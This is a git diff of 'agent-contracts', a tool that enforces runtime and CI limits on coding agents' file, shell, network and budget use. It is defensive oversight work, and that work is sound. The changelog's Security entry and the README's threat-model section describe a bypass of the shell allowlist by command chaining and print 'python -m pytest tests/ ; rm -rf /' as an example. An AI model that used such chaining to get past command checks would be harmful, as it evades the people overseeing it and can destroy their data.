diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 0968fd8..79fb20d 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -17,9 +17,19 @@ jobs: - uses: actions/setup-python@v5 with: python-version: ${{ matrix.python-version }} - - name: Install dependencies + - name: Install core (3.9) + if: matrix.python-version == '3.9' run: pip install -e ".[dev]" + - name: Install core + adapter extras (3.10+) + if: matrix.python-version != '3.9' + run: pip install -e ".[dev,claude,openai,langchain]" - name: Lint run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts - name: Test run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 1864eb1..8be8892 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -1,15 +1,56 @@ -name: Publish to PyPI +name: Release on: - release: - types: [published] + push: + tags: + - "v*" permissions: + contents: write id-token: write +concurrency: ${{ github.workflow }}-${{ github.ref }} + jobs: + verify: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Check repository hygiene + run: | + if git ls-files | rg -n '(^|/)(AGENTS\.md|CLAUDE\.md|docs/plans/|\.omx/|\.pilot/|\.dev-session/|\.staff-engineer-state\.json|\.staff-engineer\.json|ROADMAP\.md)$'; then + echo "Tracked internal-only files found in public release tree." + exit 1 + fi + - uses: actions/setup-python@v5 + with: + python-version: "3.12" + - name: Check tag version + run: | + TAG_VERSION="${GITHUB_REF_NAME#v}" + PKG_VERSION="$(python -c "from pathlib import Path; ns = {}; exec(Path('src/agent_contracts/_version.py').read_text(encoding='utf-8'), ns); print(ns['__version__'])")" + test "$TAG_VERSION" = "$PKG_VERSION" + - name: Install dependencies + run: python -m pip install -e ".[dev]" build twine + - name: Lint + run: python -m ruff check src/ tests/ + - name: Type check + run: python -m mypy src/agent_contracts + - name: Test + run: python -m pytest --cov=agent_contracts --cov-report=term-missing + - name: Validate canonical contracts + run: | + python -m agent_contracts.cli validate AGENT_CONTRACT.yaml + python -m agent_contracts.cli validate examples/support_triage.yaml + python -m agent_contracts.cli check-compat examples/support_triage.yaml examples/support_triage.yaml + - name: Build package + run: python -m build + - name: Check distributions + run: python -m twine check dist/* + publish: runs-on: ubuntu-latest + needs: verify environment: pypi steps: - uses: actions/checkout@v4 @@ -17,8 +58,12 @@ jobs: with: python-version: "3.12" - name: Install build tools - run: pip install build + run: python -m pip install build - name: Build package run: python -m build - name: Publish to PyPI uses: pypa/gh-action-pypi-publish@release/v1 + - name: Create GitHub Release + uses: softprops/action-gh-release@v2 + with: + generate_release_notes: true diff --git a/.gitignore b/.gitignore index 2a7211b..53932f6 100644 --- a/.gitignore +++ b/.gitignore @@ -18,6 +18,11 @@ htmlcov/ .coverage .coverage.* *.lcov +.omx/ +.pilot/ .dev-session/ .staff-engineer-state.json +AGENTS.md +CLAUDE.md +docs/plans/ ROADMAP.md diff --git a/AGENT_CONTRACT.yaml b/AGENT_CONTRACT.yaml index 7ba7fdd..c22fb6e 100644 --- a/AGENT_CONTRACT.yaml +++ b/AGENT_CONTRACT.yaml @@ -1,219 +1,54 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Canonical coding/build repo contract agent_contract: "0.1.0" identity: - name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. - authors: - - Piyush Vyas + name: repo-build-agent + version: "0.1.0" + description: Fail-closed coding/build agent for this repository. contract: postconditions: - - name: produces_classification + - name: produces_output check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. + description: The run must produce a result object. - - name: valid_priority - check: 'output.priority in ["critical", "high", "medium", "low"]' + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - - - name: has_routing - check: 'output.routed_to is not None' - enforcement: sync_warn - severity: major - description: Should route to a team (warn if not). - slo: - target_rate: 0.99 - window: "24h" - - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - -inputs: - schema: - type: object - required: - - ticket_id - - subject - - body - properties: - ticket_id: - type: string - subject: - type: string - body: - type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string - - preconditions: - - name: ticket_not_empty - check: "len(input.body) > 0" - description: Ticket body must not be empty. - -outputs: - schema: - type: object - required: - - priority - - category - properties: - priority: - type: string - enum: ["critical", "high", "medium", "low"] - category: - type: string - routed_to: - type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 + description: Required repo checks must pass before the run is green. effects: authorized: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - - notification.send_team - network: - - "https://api.ticketing.internal/*" - - "https://api.customers.internal/*" - - "https://kb.internal/*" - state_writes: - - "tickets.*" - - declared: - tools: - - ticket_database.read - - ticket_database.update_priority - - ticket_database.assign - - customer_lookup - - knowledge_base.search - network: - - "https://api.ticketing.internal/v2/tickets" - - "https://api.customers.internal/v1/lookup" - - "https://kb.internal/search" - state_writes: - - "tickets.priority" - - "tickets.assignment" + filesystem: + read: + - "src/**" + - "tests/**" + - "README.md" + - "pyproject.toml" + write: + - "src/**" + - "tests/**" + - "README.md" + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + - "python -m mypy *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.10 - max_tokens: 8000 - max_tool_calls: 15 - max_duration_seconds: 20.0 - -failure_model: - errors: - - name: ticket_not_found - retryable: false - description: The referenced ticket does not exist. - - - name: database_timeout - retryable: true - max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent + max_cost_usd: 1.00 + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 observability: - traces: - enabled: true - sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. - - violation_events: - emit: true - destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/CHANGELOG.md b/CHANGELOG.md index 2128a4c..63b9741 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,47 +1,32 @@ # Changelog -All notable changes to this project will be documented in this file. +All notable changes to this project are tracked here. -The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), -and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). - -## [0.1.1] - 2026-03-26 +## [0.2.0] - 2026-04-06 ### Added -- **OpenAI Agents SDK Adapter** — `ContractRunHooks(RunHooks)` for effect gating via `on_tool_start`, token tracking via `on_llm_end`, postcondition evaluation via `on_agent_end`. Pinned to `openai-agents==0.8.4` -- **Claude Agent SDK Adapter** — `ContractHooks` with structured deny via PreToolUse (not exception). Cost/token extraction from ResultMessage. Pinned to `claude-agent-sdk==0.1.50` (Python 3.10+) -- **Precondition Evaluation** — `contract.preconditions[]` evaluated on input BEFORE agent runs. Reuses CEL-like expression evaluator. `PreconditionError` blocks execution before tokens are spent. Wired into `ContractEnforcer.check_preconditions()` and `@enforce_contract` decorator -- **GitHub Action** — `pyyush/agentcontracts@v0.1.1` composite action for CI contract validation -- **README Badge** — PyPI version and CI status badges -- 35 new tests (188 total) +- repo-local coding/build-agent positioning across the README, spec, examples, and canonical contract +- filesystem read/write authorization scopes +- shell command authorization scopes +- shell-command budgets +- verdict artifact emission and CLI verdict gating +- coding-agent trace bootstrap improvements +- coding/build-focused demo contracts and CI action semantics +- real-SDK integration tests for Claude, OpenAI, and LangChain adapters (run against the pinned SDK versions in CI) -## [0.1.0] - 2026-03-25 +### Changed -First release. YAML spec + Python SDK for production agent reliability. +- positioned the contract + CLI + verdict artifact + GitHub Action as the framework-agnostic, provider-agnostic enforcement surface; the CI verdict gate is the source of truth +- pinned framework adapter SDKs to exact versions: `claude-agent-sdk==0.1.56`, `openai-agents==0.13.5`, `langchain-core==1.2.26` +- gated all three adapter extras on Python 3.10+ (core remains 3.9+) +- fixed the OpenAI adapter import path (`from agents import RunHooks`) -### Added +### Removed + +- CrewAI adapter and `[crewai]` extra +- Pydantic AI adapter and `[pydantic-ai]` extra + +### Security -- **YAML Spec Schema** — JSON Schema (Draft 2020-12) covering 3 graduated tiers: - - Tier 0 (Standalone): identity + postconditions (4 fields to start) - - Tier 1 (Enforceable): + input/output schemas, effects authorization, budgets - - Tier 2 (Composable): + failure model, delegation, observability, SLOs -- **Contract Loading** — YAML parsing, schema validation, tier assessment, upgrade recommendations -- **Effect Authorization** — Default-deny tool gating with glob pattern matching. Effects split: `authorized` (intersection during delegation) vs `declared` (union for audit) -- **Budget Enforcement** — Thread-safe circuit breaker for cost, tokens, tool calls, and elapsed time. Raises `BudgetExceededError` when thresholds are hit -- **Postcondition Evaluator** — Safe CEL-like expression evaluator (no `eval()`). Supports `is None`, comparisons, membership tests, `len()`. Three enforcement timings: `sync_block`, `sync_warn`, `async_monitor` -- **Violation Events** — OTel-compatible structured events with contract_id, violated_clause, evidence, severity, and trace context. Emits to stdout, OpenTelemetry SDK, or callback -- **Runtime Enforcer** — Unified middleware wiring effects, budgets, postconditions, and violations. Works as decorator (`@enforce_contract`), context manager, or explicit API -- **Composition Checker** — Contract Differential analysis: schema gaps, capability gaps, budget gaps, effect violations between producer/consumer contracts -- **CLI** — Four commands: - - `aicontracts validate` — schema validation + tier + recommendations - - `aicontracts check-compat` — composition compatibility check - - `aicontracts init --from-trace` — generate contract skeleton from JSONL traces - - `aicontracts test --eval-suite` — run eval suite against postconditions -- **Framework Adapters** — LangChain (`ContractCallbackHandler`), CrewAI (`ContractGuard`), Pydantic AI (`ContractMiddleware`). Each under 200 lines, 3-line integration -- **MCP Extension Proposal** — `x-agent-contract` for tool-level preconditions, effect declarations, and trust metadata -- **Specification** — Human-readable spec narrative (`SPECIFICATION.md`) -- **Examples** — Reference contracts for all 3 tiers - -[0.1.1]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.1 -[0.1.0]: https://github.com/pyyush/agentcontracts/releases/tag/v0.1.0 +- shell command authorization now strict-rejects any command containing a shell metacharacter (`;`, `&`, `|`, `<`, `>`, `` ` ``, `$(`, newline). Closes a bypass where the fnmatch `*` wildcard would consume chaining operators and let an attacker append payloads after an allowlisted prefix (e.g. `python -m pytest tests/ ; rm -rf /`). The new `ShellMetacharacterError` is a subclass of `EffectDeniedError` so existing handlers keep working. Regression coverage in `tests/test_effects.py`. diff --git a/CLAUDE.md b/CLAUDE.md deleted file mode 100644 index 5874091..0000000 --- a/CLAUDE.md +++ /dev/null @@ -1,69 +0,0 @@ -# Agent Contracts - -## What This Is - -YAML spec + Python SDK for production agent reliability. Enforces cost control, tool-use security, and audit trails at the runtime boundary. - -## Structure - -``` -schemas/agent-contract.schema.json JSON Schema (all 3 tiers) -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ - __init__.py Public API surface - types.py Frozen dataclasses (Contract, etc.) - schema.py JSON Schema loading + validation - loader.py YAML loading → Contract objects - tier.py Tier assessment (0/1/2) + recommendations - effects.py Default-deny effect gating (glob patterns) - budgets.py Thread-safe budget tracker + circuit breaker - postconditions.py Safe expression evaluator (no eval()) - violations.py OTel-compatible violation events - enforcer.py Unified enforcement middleware - composition.py Contract Differential checker - cli.py CLI (validate, check-compat, init, test) - init_from_trace.py Generate contracts from JSONL traces - adapters/ - langchain.py LangChain CallbackHandler - crewai.py CrewAI ContractGuard - pydantic_ai.py Pydantic AI ContractMiddleware - openai_agents.py OpenAI Agents SDK RunHooks - claude_agent.py Claude Agent SDK ContractHooks -examples/ Reference contracts (Tier 0, 1, 2) -tests/ pytest test suite -``` - -## Conventions - -- **Python 3.9+** — uses `from __future__ import annotations` for modern syntax -- **Type-safe** — full type annotations, `frozen=True` dataclasses, `py.typed` marker -- **No eval()** — CEL-like expressions parsed by safe evaluator -- **Default-deny** — effects.authorized is an allowlist; unlisted = blocked -- **Thread-safe** — budget counters use `threading.Lock` -- **Minimal deps** — core requires only pyyaml, jsonschema, click -- **Framework adapters** — optional extras, <200 LOC each - -## Testing - -```bash -pip install -e ".[dev]" -pytest # Run all tests -pytest -v # Verbose -pytest --cov # With coverage -``` - -## Key Commands - -```bash -aicontracts validate contract.yaml -aicontracts check-compat a.yaml b.yaml -aicontracts init --from-trace traces.jsonl -aicontracts test contract.yaml --eval-suite evals/ -``` - -## Version - -- Current: 0.1.0 -- License: Apache-2.0 -- Author: Piyush Vyas diff --git a/README.md b/README.md index ec2c73c..98f6860 100644 --- a/README.md +++ b/README.md @@ -1,184 +1,271 @@ -# Agent Contracts +# agent-contracts -[![PyPI](https://img.shields.io/pypi/v/aicontracts)](https://pypi.org/project/aicontracts/) [![CI](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml/badge.svg)](https://github.com/pyyush/agentcontracts/actions/workflows/ci.yml) +[![PyPI](https://img.shields.io/pypi/v/aicontracts.svg)](https://pypi.org/project/aicontracts/) -**YAML spec + validation SDK for production agent reliability.** +**Declare what your coding agent may read, write, run, and spend — in one YAML file at the root of your repo. Enforced at runtime. Gated in CI. Fails closed.** -Cost control, tool-use security, and audit trails in under 30 minutes of integration. Works with any framework. Enforces at the runtime layer, not via prompts. +Works with Claude Code, Codex, Cursor, and any agent runtime — the core is framework- and provider-agnostic. Optional thin adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain. -``` +```bash pip install aicontracts +aicontracts init --template coding -o AGENT_CONTRACT.yaml +aicontracts validate AGENT_CONTRACT.yaml ``` -## The Problem +> **The CI verdict gate is the source of truth.** Every run emits one durable `verdict.json`. The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + +## Why this, why now + +Coding agents are in production. Claude Code, Codex, Cursor Agent, Devin, Aider — every one of them runs with ambient authority over your repo: whatever the shell, filesystem, and network will let them do. The failure modes are no longer hypothetical: -Production agents fail at 41-87% rates. 97% of enterprises with agents in production haven't figured out how to scale them. The four pain points: +- agents editing files outside the intended scope +- destructive shell commands run on the wrong branch +- silent token-budget overruns mid-loop +- the agent reports "all tests passing" while `pytest` on disk is red — and you merge it +- unauthorized network calls and tool use buried in the trace -| Problem | Without Contracts | With Contracts | -|---------|------------------|----------------| -| **Cost runaway** | No ceiling on token spend | Budget circuit breaker per invocation | -| **Unauthorized tool use** | Ambient authority, prompt-bypassable | Default-deny allowlist at SDK layer | -| **No audit trail** | No record of authorized vs. actual | OTel-compatible violation events | -| **Silent regressions** | Prompt changes break things invisibly | Versioned contracts with SLO monitoring | +A repo shouldn't trust an agent any more than it trusts a random PR. `agent-contracts` is the smallest thing that gives a repo a declarative *"here is exactly what this agent may do"* — and a CI gate that refuses to merge runs that violated it. -## 5-Minute Quick Start +## What an agent cannot do under a contract -### 1. Write a Contract (or generate one) +| Agent attempts | Without a contract | With agent-contracts | +|---|---|---| +| `Write(".env", ...)` | silently succeeds | not in `filesystem.write` → denied | +| `Bash("rm -rf node_modules")` | runs | not in `shell.commands` → denied | +| `Bash("python -m pytest tests/ ; rm -rf /")` | runs | shell metacharacter → denied | +| Fetches `https://evil.example.com` | runs | not in `network` → denied | +| Burns 200k tokens in a loop | silent | hits `max_tokens: 50000` → blocked | +| Reports "all tests passing" while pytest is red | merges green | postcondition fails → verdict: `fail`, CI gate red | + +## Quick start + +### 1. Generate a starter contract + +```bash +aicontracts init --template coding -o AGENT_CONTRACT.yaml +``` + +This drops a ready-to-use coding-agent contract in your repo: ```yaml -# AGENT_CONTRACT.yaml agent_contract: "0.1.0" - identity: - name: my-agent - version: "1.0.0" - -contract: - postconditions: - - name: produces_output - check: "output is not None" - enforcement: sync_block - severity: critical + name: repo-build-agent + version: "0.1.0" effects: authorized: - tools: [search, database.read] - network: ["https://api.example.com/*"] + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] resources: budgets: - max_cost_usd: 0.50 - max_tokens: 10000 + max_tokens: 50000 max_tool_calls: 20 -``` + max_shell_commands: 10 + max_duration_seconds: 1800 -Or generate from observed behavior: +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" -```bash -aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" ``` -### 2. Enforce at Runtime - -```python -from agent_contracts import load_contract, ContractEnforcer +Empty `tools`, `network`, and `state_writes` lists mean *default-deny*: the agent cannot use any tool, hit any network endpoint, or write to any tracked state unless you list it. -contract = load_contract("AGENT_CONTRACT.yaml") +### 2. Hook it into your agent runtime -with ContractEnforcer(contract) as enforcer: - # Each tool call is checked against the allowlist and budget - enforcer.check_tool_call("search") # OK - in allowlist - enforcer.check_tool_call("delete_all") # BLOCKED - not authorized +The Claude Agent SDK adapter forwards every tool call into the enforcer — no manual instrumentation: - enforcer.add_cost(0.05) # Tracked against max_cost_usd - enforcer.add_tokens(500) # Tracked against max_tokens +```python +from agent_contracts import load_contract +from agent_contracts.adapters.claude_agent import ContractHooks +from claude_agent_sdk import ClaudeAgentOptions, query - # Postconditions evaluated after execution - enforcer.evaluate_postconditions(result) -``` +contract = load_contract("AGENT_CONTRACT.yaml") +hooks = ContractHooks(contract) -### 3. Framework Integration (3 lines) +options = ClaudeAgentOptions(hooks=hooks.get_hooks_config()) +async for message in query(prompt="refactor src/app.py", options=options): + if hasattr(message, "total_cost_usd"): + hooks.track_result(message) -**LangChain:** -```python -from agent_contracts.adapters.langchain import ContractCallbackHandler -handler = ContractCallbackHandler.from_file("AGENT_CONTRACT.yaml") -agent.invoke({"input": query}, config={"callbacks": [handler]}) +verdict = hooks.enforcer.finalize_run(output={"status": "done"}) +print(verdict.outcome) # pass | warn | blocked | fail ``` -**CrewAI:** -```python -from agent_contracts.adapters.crewai import ContractGuard -guard = ContractGuard.from_file("AGENT_CONTRACT.yaml") -result = guard.execute(crew, inputs={"query": query}) -``` +OpenAI Agents SDK and LangChain adapters follow the same pattern. For agents *without* an SDK hook surface (bash drivers, custom subprocess loops), the verdict gate in step 3 still catches every violation post-hoc. -**Pydantic AI:** -```python -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -middleware = ContractMiddleware.from_file("AGENT_CONTRACT.yaml") -result = await middleware.run(agent, prompt) -``` +### 3. Gate the verdict in CI -**OpenAI Agents SDK:** -```python -from agent_contracts.adapters.openai_agents import ContractRunHooks -hooks = ContractRunHooks.from_file("AGENT_CONTRACT.yaml") -result = await Runner.run(agent, "prompt", run_hooks=[hooks]) +```bash +aicontracts validate AGENT_CONTRACT.yaml +aicontracts check-verdict .agent-contracts/runs//verdict.json ``` -**Claude Agent SDK:** -```python -from agent_contracts.adapters.claude_agent import ContractHooks -hooks = ContractHooks.from_file("AGENT_CONTRACT.yaml") -# Pass hooks.pre_tool_use to ClaudeAgentOptions +`check-verdict` exits non-zero on `blocked` or `fail`. Wire it into a required GitHub check and the merge cannot proceed without an honest contract pass. + +## Verdict artifacts + +Every meaningful run can emit one compact artifact, for example: + +```json +{ + "run_id": "...", + "outcome": "pass", + "checks": [ + {"name": "pytest", "status": "pass", "exit_code": 0}, + {"name": "ruff", "status": "pass", "exit_code": 0} + ], + "budgets": { + "tokens": 12345, + "shell_commands": 2, + "duration_seconds": 18.2 + }, + "violations": [] +} ``` -## Three Tiers +Outcome semantics: -Start simple, add guarantees as production demands. - -| Tier | Fields | Value | -|------|--------|-------| -| **0: Standalone** | identity + 1 postcondition (4 fields) | Self-documentation, local validation | -| **1: Enforceable** | + schemas, effects, budgets | Cost control, tool gating, I/O validation | -| **2: Composable** | + failure model, delegation, observability, SLOs | Multi-agent composition, audit trails, canary gates | +- `pass` — required checks and blocking clauses passed +- `warn` — allowed to proceed, but warnings were recorded +- `blocked` — an operation was denied during the run +- `fail` — the run completed, but required checks or critical postconditions failed ## CLI ```bash -# Validate a contract +# Validate a contract and show coding/build surfaces aicontracts validate AGENT_CONTRACT.yaml +# Generate a coding-agent starter template +aicontracts init --template coding -o AGENT_CONTRACT.yaml + +# Bootstrap from traces +aicontracts init --from-trace traces.jsonl -o AGENT_CONTRACT.yaml + # Check composition compatibility aicontracts check-compat producer.yaml consumer.yaml -# Generate from execution traces -aicontracts init --from-trace traces.jsonl - -# Run eval suite against postconditions -aicontracts test AGENT_CONTRACT.yaml --eval-suite tests/ +# Gate a verdict artifact in CI (exits non-zero on blocked/fail) +aicontracts check-verdict .agent-contracts/runs//verdict.json ``` -## Key Design Decisions +## Framework adapters (optional) + +The core (contract, CLI, verdict artifact, GitHub Action) is framework-agnostic and provider-agnostic. Adapters are optional ergonomic helpers that wire in-runtime hook calls into the same enforcer. Each is pinned to a specific SDK version and tested against the real SDK in CI. + +| Framework | Extra | Pinned SDK | +|---|---|---| +| Claude Agent SDK | `aicontracts[claude]` | `claude-agent-sdk==0.1.56` | +| OpenAI Agents SDK | `aicontracts[openai]` | `openai-agents==0.13.5` | +| LangChain | `aicontracts[langchain]` | `langchain-core==1.2.26` | + +All three SDK extras require Python 3.10+. The core package supports Python 3.9+. + +In-runtime adapters add hard-stop coverage where the host exposes a pre-execution hook, but enforcement completeness still depends on the host's hook surface. The CI verdict gate is what makes enforcement total: every merge runs the same evaluator against the same contract, regardless of which framework, model, or runtime produced the run. + +### v0.3.0 roadmap + +A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. + +## Shell command matching: threat model -1. **Spec + SDK, not protocol or platform** — the OpenAPI model -2. **YAML primary** — JSON Schema validation, CEL-like inline expressions -3. **Graduated tiers** — Tier 0 is 4 fields, not 40 -4. **Effects: authorized vs. declared** — intersection for delegation, union for audit -5. **Enforcement at SDK layer** — never in prompts (prompt injection can't bypass) -6. **MCP extension, not fork** — `x-agent-contract` on tool definitions +Shell command authorization in v0.2.x is **strict reject + glob match**. Any command containing a shell metacharacter — `;` `&` `|` `<` `>` `` ` `` `$(` or a newline — is denied outright, even if its prefix matches an allowlisted pattern. This rules out command chaining, redirection, process substitution, and command injection at the contract layer. -## Positioning +```yaml +shell: + commands: + - "python -m pytest *" # matches: python -m pytest tests/test_app.py + # denied: python -m pytest tests/ ; rm -rf / +``` -MCP governs how agents connect. Agent Skills govern what agents advertise. -A2A governs how agents find each other. **Agent Contracts govern what agents -must do, must not do, and what happens when they fail.** +The trade-off: legitimate piped commands like `cat file | head` cannot be expressed as a single allowlist entry today. Wrap them in a script the contract authorizes by name, or split them into two records. v0.3.x will introduce a `shlex`-based token matcher that can express richer command shapes safely without weakening the fail-closed property. -## Project Structure +## GitHub Action +```yaml +- uses: pyyush/agentcontracts@v0.2.0 + with: + contract: AGENT_CONTRACT.yaml + verdict: .agent-contracts/runs/${{ github.run_id }}/verdict.json ``` -schemas/ JSON Schema for AGENT_CONTRACT.yaml -spec/SPECIFICATION.md Human-readable spec narrative -mcp/x-agent-contract.md MCP extension proposal -src/agent_contracts/ Python SDK - loader.py Contract loading + validation - enforcer.py Runtime enforcement middleware - effects.py Default-deny effect gating - budgets.py Budget tracking + circuit breaker - postconditions.py Postcondition evaluation - violations.py OTel-compatible violation events - composition.py Contract Differential checker - cli.py CLI tool - adapters/ Framework adapters -examples/ Reference contracts (Tier 0, 1, 2) + +The action validates contracts and, when a verdict path is provided, fails the workflow for `blocked` or `fail` outcomes. + +## Canonical examples + +- `AGENT_CONTRACT.yaml` — canonical repo-build agent contract +- `examples/repo_build_agent.yaml` — reference coding/build repo contract +- `examples/demo_blocked_file_write.yaml` — protected-file demo +- `examples/demo_blocked_command.yaml` — forbidden-command demo +- `examples/demo_failed_checks.yaml` — red-checks demo +- `examples/support_triage.yaml` — broader tier-2 example retained for composition docs + +## Project structure + +```text +schemas/ JSON Schema for AGENT_CONTRACT.yaml +spec/SPECIFICATION.md Human-readable specification +src/agent_contracts/ Python SDK + cli.py CLI entry point + loader.py YAML loading + validation + types.py Dataclasses / type model + effects.py Tool, filesystem, network, and shell authorization + budgets.py Budget tracking + postconditions.py Postcondition evaluation + enforcer.py Runtime enforcement + verdict artifacts + init_from_trace.py Bootstrap from traces + adapters/ Host/framework integrations +examples/ Reference contracts and demos +action.yml GitHub composite action +AGENT_CONTRACT.yaml Canonical coding-agent contract ``` -## License +## Why YAML, not Markdown? -Apache-2.0 +A contract is a machine-enforceable artifact, not documentation. Markdown is prose; YAML is structure. The difference matters when the same file has to be parsed by a CLI, an in-runtime enforcer, and a CI gate — and produce the same verdict every time. + +- **Deterministic parse.** YAML has a JSON Schema (`schemas/agent-contract.schema.json`). Every runtime, in any language, produces the same parse tree from the same file. Markdown would require an LLM or a brittle regex extractor, and the verdict would depend on which extractor you used. +- **Fail-closed needs typed fields.** `effects.authorized.filesystem.write: ["src/**"]` is a list of glob patterns. There is no ambiguity about whether `tests/secret.env` is in scope. A Markdown bullet under "## Files the agent can write" is interpretation, and interpretation is exactly what coding-agent guardrails cannot afford. +- **Diff-friendly review.** YAML diffs per field. A reviewer can see "this PR added `python -m mypy *` to authorized shell commands" as a one-line change. Markdown prose diffs are noisy and merge conflicts on policy text are hard to reason about. +- **Versioned schema.** `agent_contract: "0.1.0"` declares the spec version. Older runtimes can refuse contracts they don't understand; newer runtimes can ignore unknown fields under the `x-` prefix. Markdown has no equivalent. +- **Cloud-native muscle memory.** kubectl, GitHub Actions, OpenAPI, Helm, GitLab CI, ArgoCD — every fail-closed policy artifact in the ecosystem is YAML or JSON. Engineers already know how to author, lint, and review it. +- **Still legible.** For the canonical coding-agent case (one identity block, one effects block, a few postconditions), the YAML is short enough to read without ceremony. The quick-start contract above fits on one screen. + +Markdown is the right format for the *human spec* (`spec/SPECIFICATION.md`) and for prose explanations of how the system works. It is not the right format for the file the enforcer reads on every run. -## Author +## Scope and non-goals -Piyush Vyas +This repo is intentionally narrow. + +In scope: + +- repo-local contracts for coding/build agents +- file, shell, tool, network, and budget boundaries +- runtime + CI gating +- durable verdict artifacts + +Out of scope for the current release: + +- hosted control planes +- compliance dashboards +- generic agent governance positioning +- speculative multi-agent infrastructure + +## License + +Apache-2.0 diff --git a/action.yml b/action.yml index b4b1c1c..4e163cb 100644 --- a/action.yml +++ b/action.yml @@ -1,5 +1,5 @@ -name: 'AI Contracts Validate' -description: 'Validate agent contracts against the AI Contracts spec' +name: 'Agent Contracts Gate' +description: 'Validate repo-local agent contracts and optionally gate a run verdict artifact' branding: icon: 'shield' color: 'blue' @@ -8,8 +8,16 @@ inputs: contract: description: 'Path to contract YAML file(s), space-separated' required: true + verdict: + description: 'Optional verdict artifact path to gate' + required: false + default: '' fail-on-warning: - description: 'Fail if contract has upgrade recommendations' + description: 'Fail if contract validation returns upgrade recommendations' + required: false + default: 'false' + fail-on-warn-outcome: + description: 'Fail if the verdict outcome is warn' required: false default: 'false' python-version: @@ -20,10 +28,13 @@ inputs: outputs: outcome: description: 'pass or fail' - value: ${{ steps.validate.outputs.outcome }} + value: ${{ steps.gate.outputs.outcome }} tier: description: 'Contract tier (0, 1, or 2)' - value: ${{ steps.validate.outputs.tier }} + value: ${{ steps.gate.outputs.tier }} + verdict-outcome: + description: 'Verdict outcome when a verdict artifact is provided' + value: ${{ steps.gate.outputs.verdict_outcome }} runs: using: 'composite' @@ -34,25 +45,46 @@ runs: - name: Install aicontracts shell: bash - run: pip install aicontracts + run: python -m pip install aicontracts==0.2.0 - - name: Validate contracts - id: validate + - name: Validate contract and verdict + id: gate shell: bash run: | + set -euo pipefail outcome="pass" + tier="" + verdict_outcome="" + for contract in ${{ inputs.contract }}; do echo "::group::Validating $contract" - result=$(aicontracts validate "$contract" -j) - if [ $? -eq 0 ]; then - tier=$(echo "$result" | python3 -c "import sys,json; print(json.load(sys.stdin)['tier'])") - echo "tier=$tier" >> "$GITHUB_OUTPUT" - else + result=$(python -m agent_contracts.cli validate "$contract" --json-output) + tier=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(data["tier"])') + recommendations=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(len(data["recommendations"]))') + echo "$result" + echo "::endgroup::" + if [ "${{ inputs.fail-on-warning }}" = "true" ] && [ "$recommendations" -gt 